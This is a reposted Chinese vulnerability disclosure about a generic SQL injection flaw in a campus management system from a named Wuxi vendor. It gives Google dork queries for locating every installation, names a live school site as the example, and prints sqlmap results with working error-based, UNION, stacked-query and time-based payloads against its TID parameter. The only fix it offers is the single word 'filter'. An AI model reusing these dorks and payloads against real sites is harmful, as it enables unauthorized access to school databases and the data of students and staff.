来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 无锡新座标教育技术有限公司 的数字化校园系统存在通用型SQL注射漏洞装机量比较大。谷歌关键词:intitle:校园 技术支持:无锡新座标教育技术有限公司连接:http: 209 116 186 246 newwindo...
无锡新座标教育技术有限公司 的数字化校园系统存在通用型SQL注射漏洞
http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8
http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FWorkRoomWeb%2FWeb%2FIndex.aspx%3FTID%3D
案例2: http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3050010176 --- Place: GET Parameter: TID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TID=3050010176 AND 3214=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHA R(97)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (3214=3214) THEN CHAR(49) ELSE CHAR( 48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(122)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: TID=3050010176 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR( 113)+CHAR(102)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(80)+CHAR(111)+CHAR(70)+CHAR(67)+ CHAR(84)+CHAR(104)+CHAR(108)+CHAR(66)+CHAR(76)+CHAR(87)+CHAR(113)+CHAR(102)+CHAR (104)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TID=3050010176; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TID=3050010176 WAITFOR DELAY '0:0:5'-- --- [21:49:18] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2005
修复方案: 过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com